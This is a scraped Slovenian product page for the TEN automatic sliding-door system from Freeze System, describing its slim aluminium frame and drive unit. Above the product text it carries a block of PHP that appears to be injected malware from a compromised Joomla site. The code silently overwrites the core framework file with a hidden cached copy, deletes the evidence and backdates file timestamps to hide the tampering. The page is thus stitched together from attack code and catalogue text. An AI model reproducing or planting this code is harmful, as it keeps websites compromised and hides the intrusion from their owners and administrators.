$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Avtomatska vrata - FREEZE SYSTEM - Sistem TEN

Sistem TEN

ten_g5

Sodobni trendi graditve poslovnih objektov narekujejo nove pristope definiranja vstopnih prostorov. Minimizacija elementov in zahtevna estetika od proizvajalcev terja inovativne rešitve ter brezkompromisno funkcionalnost.

 

 

 

 

TEN sistem odlikujejo tri značilnosti:

  • vgradni podboj, v katerem je avtomatizacija je visok le 100 mm in prekrit z aluminijem
  • podboj je nastavljiv do 12 mm, kar omogoča lažje prilagajanje arhitekturi zgradbe
  • podboj je sestavljen iz dveh delov, ki se ob sestavi združita

ten1

VGRADNJA:

ten4

 

 

Eleganten pokrov v katerem je skrita avtomatizacija za odpiranje drsnih vrat je sestavljen iz dveh anodiziranih aluminijskih delov.

 

 

Vozički in koleščka so postavljeni v prvi del, mobilna krila pa so pritrjena na njih. To omogoča lahko inštalacijo ter prilagajanje kril.

 

 

Enota, ki sproža drsenje vrat je sestavljena iz motorja, elektronske nadzorne plošče in transformerja, ki je nameščen v drugem delu. Kablovje je skrito in zavarovano pod aluminijskim pokrovom.

ten3

TEHNIČNE ZNAČILNOSTI:

ten_s